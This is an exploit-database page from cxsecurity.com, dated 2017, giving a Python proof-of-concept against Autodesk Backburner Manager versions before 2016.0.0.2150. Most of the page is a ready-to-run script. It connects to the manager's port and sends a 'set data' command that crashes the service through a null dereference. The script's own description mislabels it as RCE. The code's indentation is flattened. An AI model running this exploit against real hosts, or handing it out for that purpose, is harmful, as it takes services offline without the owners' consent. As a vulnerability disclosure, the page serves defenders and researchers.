Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference DoS

Published
Credit
Risk
2017.01.27
b0nd
Low
CWE
CVE
Local
Remote
N/A
N/A
Yes
No

import sys
import datetime
import socket
import argparse
import os
import time

remote_host = ''
remote_port = ''

def callExit():
print "\ntt[!] exiting at %s .....\n" % datetime.datetime.now()
sys.exit(1)

def mySocket():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error:
print 'Failed to create socket'
sys.exit()

print "\nt[+] Socket Created"

s.connect((remote_host, remote_port))
print "\nt[+] Socket Connected to %s on port %s" % (remote_host, remote_port)

return s

# 250 backburner 1.0 Ready.
def receiveBanner(s):
banner = s.recv(4096)
print banner


def receiveData(s):
data = s.recv(4096)
print data


def setDataCommand(s):
receiveData(s) # backburner>
print "Set Data Command"
time.sleep(1)
command = "set data\r\n"
try:
s.sendall(command)
except socket.error:
print 'Send failed'
sys.exit()
print "BackBurner Manager should have crashed"
receiveData(s) # 200 Help
receiveData(s) # Available Commands:.....and all set of commands
# backburner>


def main():
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
os.system('clear')

parser = argparse.ArgumentParser(description = 'RCE Autodesk BackBurner')
parser.add_argument('--host', nargs='?', dest='host', required=True, help='remote IP of Autodesk host')
parser.add_argument('--port', nargs='?', dest='port', default=3234, help='remote Port running manager.exe')

args = parser.parse_args()

if args.host == None:
print "t[!] IP of remote host?"
sys.exit()

global remote_host
global remote_port

remote_host = args.host
remote_port = args.port

print "remote_host: %s" % remote_host
print "remote_port: %s" % remote_port

s = mySocket()
receiveBanner(s)
setDataCommand(s)

print 'exit'
sys.exit()


if __name__ == '__main__':
try: sys.exit(main())
except KeyboardInterrupt:
callExit()


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com